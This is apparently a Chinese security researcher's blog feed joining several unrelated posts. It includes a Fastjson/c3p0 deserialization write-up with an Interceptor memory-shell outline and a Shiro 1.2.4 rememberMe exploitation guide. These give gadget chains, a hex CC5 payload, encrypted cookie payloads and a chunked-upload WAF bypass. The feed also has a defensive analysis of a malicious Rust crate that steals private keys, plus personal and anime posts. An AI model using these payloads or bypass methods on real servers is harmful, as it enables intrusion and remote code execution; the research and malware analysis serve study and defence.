来分析下行情吧,币圈行情下跌多半是美以伊冲突导致的,从 2026 年 2 月 28 号发动袭击以来,就一直处在低位震荡趋势
至于上证,上周 AI 给我回了一点血,今天接着暴跌,考虑到深圳对小龙虾的新政策,感觉这也在原因之中
目前币圈还处于亏损状态,盈亏 -10000 人民币,大 A 处于盈利状态 6%
]]>这就是我研究生一战,为什么摆烂了呢?说实话还是因为外界原因干扰的,考研期间我所考的科目是 11408,一共需要考以下这几门科目
我本科就读的是软件工程,算半个科班吧,其中有些科目必须从 0 开始学起,所以还是耗了一段时间的,再加上我是直接从中专跳到本科(没有读过大专),数学这一块还是有一点困难的,还有就是我报名的学校是京区,也就是大家口中的 A 区,考虑到压分 + 自身不努力因数,这是我摆烂的第一个理由,第二个就是在考研期间我打了很多比赛 + 外接了一些项目和出题的活,不能静下心来,那时候的我已经是个非常严重的 ADHD 患者,每天就是躺在床上睡不着的那种,过的日子十分焦虑 + 煎熬,于是到了 2024 年 12 月考研这天,不出意外,没考上。
事到如今,你问我后不后悔,我的回答是 “不后悔”,因为这一切都是我自己作的,自己犯的错就要自己吃下去,当然我也总结反思了一下,为什么会这样子,说到底还是因为这两个原因
可能有人会问了,那你考研后都在干些什么?说实话整个 25 年上半年,基本上没啥动作,陪学弟们打了几场比赛(旅游)后,就在家里面接着做项目了,期间接了一些外包的活,然后面试了奇安信深圳安服(过了没去),没去的原因还是因为自己考研期间很少接触安服这块 + 深圳租房问题,怕去了跟不上公司的强度
不过好在面过了后给了我一定的信心,于是整个 25 年期间,我在没工作的情况下,做的基本上都是红队的活,至于在干些什么,这里就不说了
那我接下来还会再考吗?考虑到将来就业 + 研究生烂大街情况,评价为 可能会再考,但是是一种不确定因素,因为考研并不限制年龄报名,这意味着我将来有工作了也可以考一个玩玩
愿读到此篇文章的你,前程似锦。
]]>
友情提示:相关技术已经过时,本文所涉及到的知识仅供参考,不具备任何攻击实战利用姿势
相关依赖,需要手动开启 autoType
1 | <dependency> |
关键路由
1 | static { |
Fastjson 就不用说了,大家懂得都懂,主要是 c3p0,这个在以前做 Java 课设的时候经常用到,那时候就在想有没有什么漏洞,一般来说 c3p0 作为 Java 生态中老牌的数据库连接池,在很多人的初学阶段都是 ComboPooledDataSource 直接梭哈,但是一般在搞安全的时候,可以通过 Reference 序列化机制允许通过远程地址加载资源,主要就是利用 com.mchange.v2.c3p0.JndiRefForwardingDataSource,如果你能控制它的 jndiName 属性,就能触发一个标准的 JNDI 注入,打法无非就这几种
先来说说这个东西,调用链 ``com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase的writeObject方法。该方法会尝试序列化connectionPoolDataSource属性,由于该属性通常为不可序列化的接口实现,程序会捕获NotSerializableException并进入catch` 块
在 catch 块中,程序调用 ReferenceIndirector#indirectForm。该方法通过 getReference() 获取对象的引用信息,并封装成一个 ReferenceSerialized 对象进行替代序列化
当目标机器触发 readObject 反序列化时,会调用 ReferenceSerialized#getObject 方法。该方法进一步调用 com.mchange.v2.naming.ReferenceableUtils#referenceToObject
1 | SerializableUtils.toByteArray(this.connectionPoolDataSource); |
在 referenceToObject 的第 36-52 行逻辑中,C3P0 会提取 Reference 中的 factoryClassLocation,如果该地址可控,程序将实例化一个 URLClassLoader 从远程地址加载并实例化(newInstance)恶意工厂类,从而导致任意代码执行。
我们接着跟进,会发现 com.mchange.v2.naming.ReferenceIndirector#referenceToObject 方法,在 36#52L 这几行,可以通过 URLClassLoader 实力化远程类,从而造成代码执行
也就是说由于目标类不在本地,C3P0 使用 URLClassLoader 根据 factoryClassLocation 提供的远程 URL 去下载并实例化恶意工厂类,有了思路,就可以编写 exp 了
Gadget:
2
3
4
5
-> ReferenceSerialized#getObject()
-> ReferenceableUtils#referenceToObject()
-> Class#forName(className, true, urlClassLoader)
-> ObjectFactory#getObjectInstance()
1 | // Calculator.java |
exp
1 | // urlClassLoader.java |
运行
跳过
先来看看 Gadget,为
1 | PoolBackedDataSourceBase#readObject() |
这里为什么说是二次反序列化,因为第一次反序列化,服务器解析了 PoolBackedDataSourceBase 对象,在第二次 C3P0 在恢复自身属性时,发现 userOverridesAsString 字段有内容,于是自动调用工具类将其 Hex 解码,并再次启动一个 ObjectInputStream 来解析这段数据,我们先跟进 com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,会发现构造方法调用了 C3P0ImplUtils.parseUserOverridesAsString
接着跟进去,会发它不仅负责解析字符串,还硬编码了对 HexAsciiSerializedMap 这种特殊格式的处理,将原本安全的字符串配置转换成了二进制流
也就是说,我们如果要构造这个 hex 字符串,得满足
1 | HexAsciiSerializedMap:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; |
才可以,我们接着跟进 SerializableUtils.fromByteArray
再次跟进 Object var1 = deserializeFromByteArray(var0);
这里会发现内部直接 new 了一个 ObjectInputStream 并调用了 readObject(),这使得攻击者可以绕过任何 JSON 或 XML 解析器的安全检查,直接执行原始的 Java 序列化攻击,这里用 CommonsCollections5 打一个试试,添加一个依赖
1 | <dependency> |
然后就是常规的 cc5 exp 编写
1 | package org.example; |
运行之后我们会得到
1 | ACED00057372002E6A617661782E6D616E6167656D656E742E42616441747472696275746556616C7565457870457863657074696F6ED4E7DAAB632D46400200014C000376616C7400124C6A6176612F6C616E672F4F626A6563743B787200136A6176612E6C616E672E457863657074696F6ED0FD1F3E1A3B1CC4020000787200136A6176612E6C616E672E5468726F7761626C65D5C635273977B8CB0300044C000563617573657400154C6A6176612F6C616E672F5468726F7761626C653B4C000D64657461696C4D6573736167657400124C6A6176612F6C616E672F537472696E673B5B000A737461636B547261636574001E5B4C6A6176612F6C616E672F537461636B5472616365456C656D656E743B4C001473757070726573736564457863657074696F6E737400104C6A6176612F7574696C2F4C6973743B787071007E0008707572001E5B4C6A6176612E6C616E672E537461636B5472616365456C656D656E743B02462A3C3CFD22390200007870000000027372001B6A6176612E6C616E672E537461636B5472616365456C656D656E746109C59A2636DD8502000449000A6C696E654E756D6265724C000E6465636C6172696E67436C61737371007E00054C000866696C654E616D6571007E00054C000A6D6574686F644E616D6571007E000578700000002F7400156F72672E6578616D706C652E6865784C6F6164657274000E6865784C6F616465722E6A61766174001267656E65726174654343355061796C6F61647371007E000B0000001571007E000D71007E000E7400046D61696E737200266A6176612E7574696C2E436F6C6C656374696F6E7324556E6D6F6469666961626C654C697374FC0F2531B5EC8E100200014C00046C69737471007E00077872002C6A6176612E7574696C2E436F6C6C656374696F6E7324556E6D6F6469666961626C65436F6C6C656374696F6E19420080CB5EF71E0200014C0001637400164C6A6176612F7574696C2F436F6C6C656374696F6E3B7870737200136A6176612E7574696C2E41727261794C6973747881D21D99C7619D03000149000473697A657870000000007704000000007871007E001778737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B657971007E00014C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00017870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D6571007E00055B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E00307371007E00287571007E002C000000027070740006696E766F6B657571007E003000000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E002C7371007E00287571007E002C000000017400126F70656E202D612043616C63756C61746F72740004657865637571007E00300000000171007E0033737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000000770800000010000000007878 |
回到题目本身,来看看怎么打,由于我出的这道题目是不出网的,所以可以打内存马,一般不出网会用到下面这几条链
1 | com.mchange.v2.c3p0.WrapperConnectionPoolDataSource |
但如果目标环境是出网,并且你和我一样是懒人,那可以用许少他们写的 Java Chains 直接生成一条,省时省力,点 FastjsonPayload,依次点开 FastjsonC3p0(C3p0 1.2.47) > JavaNativeSerialization(Java Native Deserialization) > Fastjson(Fastjson deserialised chain) > TemplatesImpl(TemplatesImpl) > BytecodeConvert(handles bytecode) > Exec(Execute commands)
打一下
这个一般是在不出网 + 遇到 Fastjson 或者 Jackson 的情况,开始前,我们得先知道冰蝎的一个加载原理,这一部分可以看看作者的先知文章,写得很好
接着网上随便找一个内存马改改,例如我这里是 Interceptor 马,大致原理如下
获取上下文控制权:利用反序列化或表达式注入漏洞,在内存中通过 RequestContextHolder 或遍历线程组寻找 WebApplicationContext,从而获得操作 Spring 容器内部组件的权限。
定位核心组件:通过反射机制定位到 Spring 处理路由的核心 Bean——RequestMappingHandlerMapping,在该对象中,存在一个存放所有拦截器的私有 List 集合(通常名为 adaptedInterceptors)。
动态插入恶意逻辑:编写一个实现 HandlerInterceptor 接口的类,并将其实例化后通过反射强行插入到该 List 的首位。由于拦截器在请求进入 Controller 之前执行,木马可以在 preHandle 方法中截获 HTTP 请求,判断特定参数并执行系统命令。
缝合一下 cc
1 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; |
构造 fastjson poc
1 | POST / |
打一个回显
然后缝合一下冰蝎,在打一下
一样的逻辑,不写了
有空再写吧
]]>哈哈,开始之前笔者先来骂下自己,笔者在以前投递过春招和秋招的简历,但是当时投了都石沉大海,那时候就很纳闷为什么参加了若干攻防演练和 CTF 竞赛还有做的一些网安小项目还找不到工作,直到现在我才知道,我都是赶在秋招和春招结束后才投的,也就是说,我总体投递的一个时间线如下
1 | 2024 年 2 月 ~ 4 月春招 |
闹麻了都,再加上以前做钓鱼的时候忘记改 BOSS 直聘和一些软件的在线简历,导致我以前的在线简历成下面这个样子
难怪 HR 和一些技术看了直接 pass 我🥵,实在是太难绷了啊
言归正传,我们来思考一下 Shiro Cookie 长度太长的话要怎么 bypass 一些在线 WAF 长度检测,首先准备以下环境
也是许少他们的,但是被删了,找到了一个存档
https://github.com/freeFV/ShortPayload
效果
注意:这里的长度是指反序列化Payload进行Base64编码后的长度
| 反序列化链 | YSOSERIAL长度 | 缩小后长度 | 缩小率 |
|---|---|---|---|
| CommonsBeanutils1 | 3692 | 1296 | 64.8% |
| CommonsCollections1 | 1868 | 1748 | 6.4% |
| CommonsCollections2 | 4176 | 1708 | 41.4% |
| CommonsCollections3 | 4784 | 2444 | 48.9% |
| CommonsCollections4 | 4720 | 2256 | 52.2% |
| CommonsCollections5 | 2772 | 3044 | -8.9% |
| CommonsCollections6 | 1708 | 1560 | 8.6% |
| CommonsCollections7 | 1700 | 1636 | 3.7% |
| CommonsCollectionsK1 | 2464 | 1708 | 30.6% |
| CommonsCollectionsK2 | 2472 | 1716 | 30.5% |
| CommonsCollectionsK3 | 1644 | 1604 | 2.4% |
| CommonsCollectionsK4 | 1652 | 1612 | 2.4% |
pom.xml
1 | <dependencies> |
LoginServlet.java
1 | package com.study.servlet; |
shiro.ini
1 | [main] |
一般 Shiro 打法很简单,我这里选的版本为 shiro-core 1.2.4,高版本的后续再说,其打法总结就是 Apache Shiro 的记住我 rememberMe 功能在处理 Cookie 时,会对这个字段进行 base64 解码,然后 AES 解密,再然后反序列化,也就是说我们只要获得到了 AES 加密的密钥,那么就可以构造任意的反序列化对象,然后进行加密发送,在 1.2.4 版本,Shiro 的 key 都是硬编码的,这个大家都知道,你可以在 org.apache.shiro.mgt.AbstractRememberMeManager#DEFAULT_CIPHER_KEY_BYTES 找到其 key 为 kPH+bIxk5D2deZiIxcaaaA==
然后默认情况下 Shiro 本身是依赖了 Commons-Beanutils 这个库,不过再打的时候可能会遇到一些版本与本地环境不一致,导致反序列化的时候出现 serialVersionUID 不匹配的问题
并且 Shiro 自带的 CB 库不包含完整的 Commons-Collections,所以我们在打的时候部分依赖 CC 的链子会失效,那么解决方法就是确保本地的 CB 和 CC 库版本与 Shiro 环境中的版本是对应上的,例如我这里用的是 Commons-Beanutils 1.8.3 和 Commons-Collections 3.1
1 | <dependencies> |
然后接下来就是手动攻击了,我们得先编写一个恶意类,比如 calculator.java,继承 AbstractTranslet,然后写一个构造函数执行
1 | package exp; |
接着编写 exp 来进行利用,比如我这里通过 CommonsBeanutils1 来进行利用,具体 sink 就是 BeanComparator.compare() $\rightarrow$ PropertyUtils.getProperty() $\rightarrow$ TemplatesImpl.getOutputProperties() $\rightarrow$ TemplatesImpl.newTransformer() $\rightarrow$ TemplatesImpl.getTransletInstance() $\rightarrow$ Runtime.exec()
1 | package exp; |
然后接下来运行脚本,我们会得到
可以看见是非常的长啊(lens:2540)
1 | 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 |
接着将构造好的恶意对象经加密后放入 rememberMe Cookie 中,当服务器解密并进行 反序列化 时,PriorityQueue(入口点)在排序时触发了 BeanComparator(中继点),进而通过反射调用了 TemplatesImpl 的 getOutputProperties() 方法,最终导致预埋在 _bytecodes 字段中的恶意类被实例化,从而在服务器上执行任意命令,至此最简单的 Shiro 漏洞复现到此结束
那么接下来就是要解决 Cookie 过长的问题了,比如可以通过 javassist 或 分块传输来缩短 Cookie 长度
由于我们最终目的是为了缩短长度,所以可以用 javassist 来将写死的恶意类通过动态构造实现缩短长度,比如上面写的 calculator.java 这个是完全写死的,无法恶意构造,所以需要动态构造一个字节码
首先引入 javassist 依赖
1 | <dependency> |
然后编写一个 javassist_poc.java
1 | package exp; |
然后修改上面的 exp.java,动态生成字节码
1 | package exp; |
接着运行生成,会发现已经小了很多了
1 | 9JRpOrsN6BC+7fiyilY7o4otMaNdpLUeJ9EnZ1VU3MYEErySYueuaIoxmO/JHEjUbepNiH9DZwDuPGr42JUCOUC8MBzF4tX8cnPgatQCCXOMjiQ6ONpWlkVywktrhnoVx5TsE40dA+QjxMBNvdbqPHnU1S1q0EPfVL5xgBZmiHvYV/TWc6LdjZdBT7x/Q22YGJ0J0iq6d5QlthCFzvSMwadM8LEaSgAZX03hxDAq8RlHzKbQJw6zb+Ygxheu95tHZkj4gGuGhmqiDhRzuZI/F+IN57aSpiXZc5QyBHD0e1bxD24gw6COfQlaFuz4uZLyMdg8Ci8UAVdEzXL+c9KBApeuepqjnR9Uhi1LptUL4pWEtMoRfQQP4molo+ET7JtfY9NQV7loZP+dG7CFVC/AkGiIfbhqPFH7K0OpuJKX9a/eRfenV16Q8VeLQgbJKDI6pyCSYCtUCdGuhHod2mUEgCyGAXOQOkj/nqZ1WqVIwh9wHndTEEHFihIz220kYzNE/+X+qGldOELSVDx6Jmm89ThTT3PqRzmPIMPbnVTZ+0EQKBlUaWwFfbo81zNXYS4uhnD0lUKYew6arFokkCUH1uNe4RGgwYCBm7pXh3q281AZJ/DEEggzu+khpXc/sDNjeIwLdRzheeIrHsYJ+BgTahycfViHFAa8OLchOABvLArrp+OxCdcwMLQdT9itfFdCPpsgURcMmaXoc0mfAfqfvuKyM1GWAXlQUXtnJjKgEp4IrpvulQRHouYocYu5mzrpYyM8+mC65Q3v0MWOW4xIzGWr0nICiuju77y2lAUJOuZt337UvQVQhr3PozDPlJCqlRWsjWFXv8GdriRhC5Vms0LVdpRbiQjXIGCAqat9bRYvtNOeLxnUwLO4DhjXs2NsH2YCw3pPduX3egvfiJmQktBxJvUHC+cd48yVy9Uiv9MCjTl88fbMEPNJN6vx7k2vulBlKn0Di48K0FfDZlZgUm6JO4fS12QCdvMJp1nVLSBbuYr4Fm8SkuSPexr0NnY+XOfCAKM16CilaMga4PtVRDO6LfwBzM0DxXRkVUTiBVS/F+O+znSqgkw9B6en/C4+yJHbxGNP3qO56iLbIp/YiCkZiQ+hclXZRgk1hVX3RCkLHiqd/JNI+RtrOwnBdn1KFUQ03Q2MMzHVuTxi9If2vLWVHhJfm+MPEjExIb9UTm1U9v8x2/6KmbwHxqLv1GjotXjQvTYOGywlzd22z5GtihzG9YcC2/MECzzrSQGzAkeZT/mCM6UfRlVe647PRCG0QSGgVBxGt0M4gB6qiyTXG1+TdHFXM45FCgXxFjq9SXh3I4cy5kQNs8Ngl+XPp9785k5QE+Lt7QnMsjDDG9y/sYqEVAmfSgrSw9Gno7TFfdnQa84RoRSNxNSGdvb63zeJmvyLdvVKbAOozPYDS7LHQg== |
打打看,发现没毛病
那还有更短的方案吗?还真有,但是利用条件非常苛刻,没有研究的必要,总结一下代码和利用思路吧,其实本质上就是省去了恶意类的读取,直接用 javassist 来进行动态生成,生成的类不含 LineNumberTable 等调试信息
1 | package exp; |
如果你想探测不出网的话,可以把 getUltraShortBytecode 里的命令改成时间延迟(Time-based Sleep)
1 | byte[] code = getUltraShortBytecode("Thread.sleep(5000);"); |
或者我们可以通过 Block Transmission 分块传输来缩短长度,这个在实战中可能非常有效,因为它能绕过 Web 容器对单个 HTTP Header 长度(通常为 8KB)的限制,同时规避了一些 WAF 对超长 Payload 的正则检测,核心逻辑就是利用 java.io.FileOutputStream 的 append 模式,将多段 Base64 或原始字节分批写入服务器临时目录/tmp ,最后再写一个 Payload 去读取并执行这个文件
其实这个思路在早年做 CS 脱裤的时候也是分块传输的逻辑,都差不多
初始化/追加阶段:发送 $N$ 个请求,每个请求带有一小段 Base64 字符串,追加写入服务器文件
执行阶段:发送最后一个请求,读取该文件,Base64 解码后动态加载执行
编写一个 chunk_exp.java
1 | package exp; |
运行后保存发送到服务器
会发现成功写进去
接着就是分块传输这个 payload,步骤太长这里跳过了,然后修改加载这个 payload
1 | String loaderCmd = "try {" + |
最后完整的代码如下
1 | package exp; |
跟着执行一遍就可以了
在 MacOS 上游玩 Galgame 实际上非常简单,你需要两个东西
然后按照下面这种方式来做配置即可,我这里下载的是《沙耶之歌》
Crossover 安装过程忽略,我们着重强调下如何配置,首先你得先新建一个 bottle
其次点开 Run Command > Command,然后配置路径
一切就绪后,点 Run 按钮即可运行 bottle
等待一会即可出现游戏界面
然后就可以愉快的游玩了!
但是偶尔会有点卡,这时候点开 Install Application into Bottle,安装一下 DirectX 和 Microsoft Visual C++ 2010 (10.0) Redistributable,就不会卡了
直接使用 PD,全称 Parallels Desktop,本质上就是 Mac 版的 VMware
简单来说
方案 A (Crossover) 胜在轻量与原生感,像打开 Mac 软件一样优雅,且不吃配置,但部分老游戏或特殊引擎会有兼容性玄学
方案 B (PD 虚拟机) 则是暴力全能,只要 Windows 能跑的它都能跑,完美解决乱码,但极度吃内存和硬盘,且风扇容易狂转
]]>IOC:www.polymarketapi.xyz || data-update.polymarketapi.xyz
MD5:63e119d4e3f98a5a9775bd95fd1fb513
Filename:redis.exe
前段时间,我的飞书 Github 监控机器人突然多了几条国产化的 Polymarket 市场预测机器人,本着有新东西就要去试试的心态,我大致检查了一下这些仓库的代码,发现有几个仓库存在供应链投毒(运行后可直接盗取私钥),这里仅列举某个仓库。下图为 Polymarket 关键词截图,与开头描述无关
友情提示:凡是涉及到金融相关的 Github 项目请仔细检查每一行代码和相关安装包依赖
这个仓库,根据作者描述,是专门用于预测 Polymarket 5 分钟市场的,虽然说是预测,但实际上只是 AI 生成的答辩罢了
大致看了一下 README,发现写的有模有样的,但还是有不少端倪,例如一些配置私钥的步骤存在明显的诱导操作
接着查了一下背景叙事,发现作者一直在推上转发自己的工具,基本上一天能发好几条
并且注册的 Github 和 X 账号都是新号(风险已经拉满了),比较好玩的是,推上还有一大堆所谓的千粉/万粉 KOL 还疯狂的转发这款工具,这里给大家提个醒,但凡你发现 KOL 转发的工具 Star 小于 100 都需要警惕并高度查阅每一行代码,如果不会的可以交给 AI 来看,例如 Claude Code Security
作者的 Github 仓库
作者的 X 账号
截止 2026 年 2 月 24 日,已有人中招,受损金额不算大
大家都知道,天下没有免费的午餐,有免费的基本上都是培训班开课恰烂钱的,所以我大致审计了一下代码,发现代码基本上都是用 AI 写出来,咱先不说能不能跑吧,这个项目能发到 Github 还能存活这么久简直是个奇迹
顺便给大家科普一个小知识,如果你发现一个项目充斥着大量的 Emoji、大量的渐变颜色、以及花里胡哨的言语、还有用上了非常经典的 Vercel + Next.js,并且拥有一个夸张的背景描述,那么这个项目或者代码大概率是用 AI 写出来的,直接无视即可
整个仓库代码基本上没什么问题(就算有问题我也懒得查了),用 AI 写的有模有样的,唯一的问题就是出现在 Cargo.toml,也就是项目依赖问题,以往 npm 供应链投毒大家都能第一时间在圈子里知道,但是 Rust 不太一样,是允许每个人上传自己的依赖上去并且不经过审查的
在这个项目的包中引用了一个叫做 rpc-check 的包,我们追踪这个包,发现是一个非常新的包,并且这个包的开发者能和 Github 仓库的开发者对上,由此可见这基本上是一起供应链投毒,做个科普吧,如果你引用了 A,A 引用了 B,B 引用了恶意包 C,那么 C 的代码就会在你的机器上运行,打开查看后发现作者还在更新这个包的代码,并且用上了最新的攻击手法 (本文仅分析作者刚发版的代码)
我们点开里面的 Security,会发现已经有人提报安全问题给了 crates.io
具体详见
https://rustsec.org/advisories/RUSTSEC-2026-0014.html
那么这个包具体做了哪些事情呢?我们通过 docs.rs 来查看该包的源代码
发现这个包释放了一个 redis.exe,这里还没有人丢到微步分析,丢进去分析后发现是一个 CS 马,具体危害大家懂得都懂
那么代码在哪里调用到了这个 redis.exe 呢?我们接着访问 src/report.rs,发现代码充斥着大量的混淆,具体详见
https://docs.rs/crate/rpc-check/latest/source/src/report.rs
不过说是混淆,实际上是非常简单的 xor,写个脚本解开后会得到
其中这个恶意脚本 safe_update.sh,很明显的命令执行
解码后得到
具体干什么就不多说了,最后总结一下上文投毒都做了些什么事吧,没工作为爱发电写文章真是辛苦我了
筛选目标,瞄准有盈利欲望、且经常接触私钥的 Web3/Polymarket 开发者,利用 AI 生成极具欺骗性的 README,通过 GitHub Star 和 X (Twitter) 营销制造“高信誉”假象,诱导受害者下载
信任劫持,攻击者在主项目代码中保持“干净”,将恶意逻辑拆分到第三方依赖包(rpc-check)中,利用 Rust crates.io 无需人工审核的特性发布毒包,并使用与主项目一致的开发者名称,进一步瓦解受害者的戒心
混淆对抗,通过简单的 XOR (异或) 运算隐藏敏感 URL 和 Shell 指令,逃避 GitHub 静态扫描和基础杀毒软件的关键词检索,代码根据运行环境(OS)切换攻击策略:Windows 侧重于持久化木马,Linux/macOS 侧重于即时脚本执行
定向搜刮,利用 tokio::spawn 开启后台异步任务,在不影响用户正常使用程序的情况下,静默读取 .env 等文件中的 PRIVATE_KEY,通过仿冒域名(如 *.polymarketapi.xyz)接收泄露数据,利用开发者对 API 域名的习惯性忽视掩盖流量异常
写入伪装成合法工具(如 redis.exe)的远控马(Cobalt Strike),建立长期的命令与控制(C2)通道,黑客获取私钥后,由后端自动化脚本监控地址余额,完成最后的“扫币”动作
下面为上文的恶意代码解密脚本,建议使用在线的 rust 编译器来跑,第二次写分析文章,写的不好还请谅解
1 | fn decrypt(bytes: &[u8], key: u8) -> String { |
El Psy Kongroo、這一切都是命運石之門的選擇(すべてはシュタインズ・ゲートの選択である)
春节用自己写的 AI 代审提了几个 CVE,通宵看部动漫奖励下自己
小孩子不能熬夜哦
点评之前,先来说一下观看顺序
命运石之门的1-22集
sp23
境界面上迷失之链
命运石之门0的1-23集
命运石之门23-25集
命运石之门剧场版负荷领域的既视感
一开始这部作品我以为讲述的是寿命论+轮回的(好像确实是?),但看到后面才发现整部作品都是围绕着时间+穿越来展开,作为一部 2009 年发行的作品,能让我在 2026 年还看得这么舒服,确实有一手。
不过说实话,前 11 集的日常铺垫确实劝退了不少人,要不是朋友告诉我后面有反转,不然我也不会坚持看下去的,但只要你撑过那个转折点,你就会发现,前面所有的废话,每一条不起眼的短信,每一瓶乱入的乌帕,全都是在为后半段的头脑风暴埋伏笔
再来说说标题,为什么说他是 “科幻神作”?
叠甲:本人没有玩过游戏作品,但完整的看了站内部分 UP 主解说的时间线,写得不好还请谅解
